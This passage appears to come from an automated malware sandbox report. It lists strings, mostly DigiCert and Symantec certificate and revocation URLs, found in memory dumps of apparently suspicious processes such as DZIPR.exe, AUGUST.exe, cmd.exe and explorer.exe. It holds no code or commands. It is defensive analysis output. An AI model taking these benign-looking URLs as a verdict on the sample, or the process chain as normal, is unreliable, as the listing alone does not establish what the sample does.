Source: DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://c0rl.m%L
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: DZIPR.exe.17.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: svchost.exe, 00000015.00000003.2438441779.000002061F000000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://ocsp.digicert.com0
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0L
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://s2.symcb.com0
Source: DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://support.datanumen.com
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcd.com0&
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: DZIPR.exe, 00000011.00000002.2343813669.0000000003588000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EB5000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004DEB000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.0000000004982000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004D5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.info-zip.org/
Source: DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://www.repairfile.com
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.symauth.com/cps0(
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.symauth.com/rpa00
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.vmware.com/0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.vmware.com/0/
